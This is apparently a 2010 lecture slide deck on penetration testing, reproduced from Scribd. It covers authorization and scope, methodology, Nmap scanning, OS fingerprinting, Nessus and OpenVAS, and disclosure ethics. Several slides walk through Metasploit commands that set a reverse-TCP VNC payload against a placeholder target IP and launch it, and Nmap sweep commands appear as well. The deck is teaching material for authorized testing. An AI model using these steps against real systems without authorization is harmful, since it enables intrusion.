0% found this document useful (0 votes)
191 views15 pages

Penetration Testing

The document discusses penetration testing and provides information on: 1) Penetration testing involves simulating an attack against a system to test its security from the viewpoint of an attacker. It is meant to complement other security tests, not replace them. 2) Tools like Nmap, Nessus, and Metasploit can be used to scan for vulnerabilities, exploit them, and test the security of a system. 3) When performing a test, an authorization letter and scope of work should be agreed upon with the client to define limits and what is allowed.

Uploaded by

me4ram
Copyright
© Attribution Non-Commercial (BY-NC)
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
0% found this document useful (0 votes)
191 views15 pages

Penetration Testing

The document discusses penetration testing and provides information on: 1) Penetration testing involves simulating an attack against a system to test its security from the viewpoint of an attacker. It is meant to complement other security tests, not replace them. 2) Tools like Nmap, Nessus, and Metasploit can be used to scan for vulnerabilities, exploit them, and test the security of a system. 3) When performing a test, an authorization letter and scope of work should be agreed upon with the client to define limits and what is allowed.

Uploaded by

me4ram
Copyright
© Attribution Non-Commercial (BY-NC)
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 15

Penetration Testing

12/7/2010

Penetration Testing

What Is a Penetration Testing?


Testing the security of systems and architectures from the point of view of an attacker (hacker, cracker ) A simulated attack with a predetermined goal that has to be obtained within a fixed time

12/7/2010

Penetration Testing

Penetration Testing Is Not


An alternative to other IT security measures it complements other tests Expensive game of Capture the Flag A guarantee of security

12/7/2010

Penetration Testing

Authorization Letter
Detailed agreements/scope
Anything off limits? Hours of testing? Social Engineering allowed? War Dialing? War Driving? Denials of Service? Define the end point

Consult a lawyer before starting the test


12/7/2010 Penetration Testing 4

To Tell or Not to Tell?


Telling too many people may invalidate the test However, you dont want valuable resources chasing a non-existent intruder very long And, elevation procedures make not telling risky

12/7/2010

Penetration Testing

Black Box
It treats the system as a "black-box", so it doesn't explicitly use knowledge of the internal structure.

vs.

White Box
It allows one to peek inside the "box", and it focuses specifically on using internal knowledge of the software to guide the selection of test data

12/7/2010

Penetration Testing

OSSTMM
OSSTMM Open-Source Security Testing Methodology Manual Version 3.0 RC 26 at www.osstmm.org http://www.isecom.org/projects/osstmm.htm

It defines how to go about performing a pen test, but does not go into the actual tools.

12/7/2010

Penetration Testing

Technique Penetration Testing


1) 2) 3) 4) 5) 6) Gather Information Scan IP addresses Fingerprinting Identify vulnerable services Exploit vulnerability (with care!) Fix problems ?

12/7/2010

Penetration Testing

Gathering Information
Goal Given a companys name, determine information like:
what IP address ranges they have
WHOIS (arin.net ) Nslookup

personal information
Social engineering Google we.register.it
12/7/2010 Penetration Testing 9

Scan IP Addresses
Goal Given a set of IP addresses, determine what services and Operating Systems each is running. Nmap www.nmap.org Gfi languard

12/7/2010

Penetration Testing

10

Fingerprinting
What web server is running? What accounts have I found? What services are running? What OSes are running? Who is logged in? Is there available information on the web site?

12/7/2010

Penetration Testing

11

Identify Vulnerable Services


Given a specific IP address and port, try to gain access to the machine. Report all known vulnerabilities for this target. Nessus OpenVAS

12/7/2010

Penetration Testing

12

12/7/2010

Penetration Testing

13

12/7/2010

Penetration Testing

14

Exploit vulnerability
Try to exploit detected vulnerabilities, for example:
Buffer overflow Heap overflow SQL injection Code injection Cross-site scripting

Metasploit is a framework that allows to test attacks


12/7/2010 Penetration Testing 15

12/7/2010

Penetration Testing

16

Alternatives
Tools Core Impact Features License
25.000$ Open-source (but some libraries are only in binaries) Frequently (weekly) 1.450$ Open source 3 months of updates and support more of 150 Free and Open-source Free and Open-source

Immunity Canvas

SecurityForest

Metasploit

Number of Exploits Updates Platform

~2500 (at February 2005) Frequently (average 4 Occasionally (last exploit every month) updates in 2005) Independent Python Only Windows Perl for framework, many others languages for exploits (C,Perl,Python,Ruby,Sh ell,...) Number of precompiled exploits (see ExploitationTree)

191 (at October 2007) Occasionally (last updates on October 2007) Independent Ruby, C, Assembler

Only Windows Python

Program Language

Advantages

Report system / Integrationwith vulnerability assessment tools

0-day payload

Free / IDS-IPS evasion / support to write exploits and large used in security community

Penetration Test Tutorial

12/7/2010

Penetration Testing

18

Nmap (Network Mapper)


Port Division - open, closed, filtered, unfiltered, open|filtered and closed|filtered Scanning techniques
-sS (TCP SYN scan) -sT (TCP connect() scan) -sU (UDP scans) -sA (TCP ACK scan) -sW (TCP Window scan) -sM (TCP Maimon scan) --scanflags (Custom TCP scan) -sI <zombie host[:probeport]> (Idlescan) -sO (IP protocol scan) -sN; -sF; -sX (TCP Null, FIN, and Xmas scans) -b <ftp relay host> (FTP bounce scan)
12/7/2010 Penetration Testing 19

Identify active hosts and services in the network


ping sweep useful to identify targets and to verify also rogue hosts Ex:
nmap -v -sP 192.168.100.0/24
-sP Ping scan.

port scanning useful to identify active ports (services or daemons) that are running on the targets Ex:
nmap -v -sT 192.168.100.x
-sT normal scan -sS stealth scan

12/7/2010

Penetration Testing

20

Identify target OS version


OS Fingerprinting: there are different values for each OS (Ex. TCP stack, ) Ex: Nmap O <target>
linux 2.4 ttl 64 packet length 60 initial windows 5840 mss 512 ip id 0 enabled tcp opt MNNTNW timestamp inc. 100hz sack OK SYN attempts 5
12/7/2010

linux 2.6 64 60 5840 512 random MNNTNW 1000hz OK 5

openbsd

windows 9x 64 32 64 48 16384 9000 1460 1460 random Increment M M unsupported unsupported OK OK 4 3


Penetration Testing

windows 2000 windows xp 128 128 48 48 16384 16384 1460 1460 increment increment MNNT MNW unsupported unsupported OK OK 3 3
21

Vulnerability scanning
Nessus is a leader tool in vulnerability
scanning There are two components :
nessusd server with plugins list of known vulnerabilities (there are different kinds of subscription depending on how old are plugins) nessus is a front end of the tool there are several version for windows and linux systems

12/7/2010

Penetration Testing

22

Introduction to Nessus
Created by Renaud Deraison Currently Maintained by Tenable Network Security Uses the NASL Scripting language for its plugins (currently over 13,000 plugins!) Price is still Free! But no more open source Register to obtain many NASL plugins (7 day delay). Or Purchase a Direct Feed for the Latest!

12/7/2010

Penetration Testing

23

Nessus Features
Client/Server Architecture SSL/PKI supported Smart Service Recognition
(i.e. FTP on 31337)

Non-Destructive or Thorough Tests Vulnerability Mapping to CVE, Bugtraq, and others Vulnerability Scoring using CVSS from NIST.

12/7/2010

Penetration Testing

24

OpenVAS
OpenSource Vulnerability Assessment Scanner Previously GNessUs (a GPL fork of the Nessus) OpenVAS is a security scanner to allow future free development of the now-proprietary NESSUS tool OpenVAS now offers 15000 Network Vulnerability Tests (NVTs) more all NASL plugins.
12/7/2010 Penetration Testing 25

Open VAS technology

12/7/2010

Penetration Testing

26

Exploit vulnerabilities
metasploit is a framework that allows to perform real attacks You need to start metasploit from the start menu (Penetration Test->Framework 3)
msfconsole

12/7/2010

Penetration Testing

27

Select the exploit and the payload


Select an exploit:
msf > use windows/http/altn_webadmin msf exploit(altn_webadmin) >

Select the payload for the exploit (setting the


PAYLOAD global datastore) msf exploit(altn_webadmin) >
set PAYLOAD windows/vncinject/reverse_tcp PAYLOAD => windows/vncinject/reverse_tcp

12/7/2010

Penetration Testing

28

Set options for exploit and payload


Show options
msf exploit(altn_webadmin) > show options

Set the options:


msf> set RHOST 192.168.100.x TARGET IP msf> set RPORT 1000 VULNERABLE SERVICE msf> set LHOST 192.168.100.Y ATTACKER IP msf> set TARGET 0 TYPE OF EXPLOIT

Launch the exploit


msf exploit(altn_webadmin) > exploit
12/7/2010 Penetration Testing 29

Vulnerabilities disclosure
If we find a new vulnerability (Zero Day Vulnerability) What we have to do?
Do not say anything and maintain the secret perhaps in the future the producer will fix it Spread the information:
to all or just to the producer

Which level of detail reveal


Full disclosure with possibility of helping cracker? Partial disclosure that could be unuseful?

Sell it
12/7/2010 Penetration Testing 30

You might also like